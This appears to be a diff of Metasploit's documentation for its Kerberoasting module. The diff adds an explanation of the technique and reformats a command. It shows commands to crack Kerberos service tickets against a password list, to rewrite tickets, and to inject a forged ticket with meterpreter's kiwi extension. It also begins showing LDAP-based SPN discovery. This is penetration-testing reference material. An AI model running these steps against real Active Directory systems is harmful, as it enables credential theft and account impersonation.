rapid7/metasploit-framework/documentation/modules/auxiliary/admin/kerberos/kerberoasting.md

 6. Crack the encryped password in the service ticket using tgsrepcrack.py (more info on this python script below)
 	1. Do:  `python3 tgsrepcrack.py passlist.txt 1-40a10000-Administrator@HTTP\~testService-EXAMPLE.COM.kirbi`
 7. Rewrite the service tickets using kerberoast.py (more info on this python script below)
-	1. Do:  `python3  kerberoast.py -p N0tpassword! -r 1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM.kirbi -w Administrator.kirbi -u 500`
+	1. Do:  `python3  kerberoast.py -p N0tpassword!
+	    -r 1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM.kirbi -w Administrator.kirbi -u 500`
 8. Finally inject the ticket back into RAM using meterpreter's kiwi extension
 	1. `meterpreter > kiwi_cmd kerberos::ptt Administrator.kirbi`

+## Kerberoasting

+Kerberoasting is a post-exploitation technique that tries to crack the password of a service acount withtin Active Directory.
+The attacker requests a ticket while pretending to be an account user with a service principal name (SPN), which contains an encrypted password.
+Once recieved, the attacker attemps to crack the password hash.

+If successful, the attacker possess user credentials that can be used to impersonate the account owner.
+Now the attacker appears to be an approved and legitimate user and has unrestricted access to any assets, systems or networks granted to the compromised account, boom roasted.

-## Scenario
+## Scenarios

 ### SPN Discovery

 First an SPN needs to be found.
 This can be done in a number of ways including using metasploit's very own ldap_query module :

 ```
 msf6 > use auxiliary/gather/ldap_query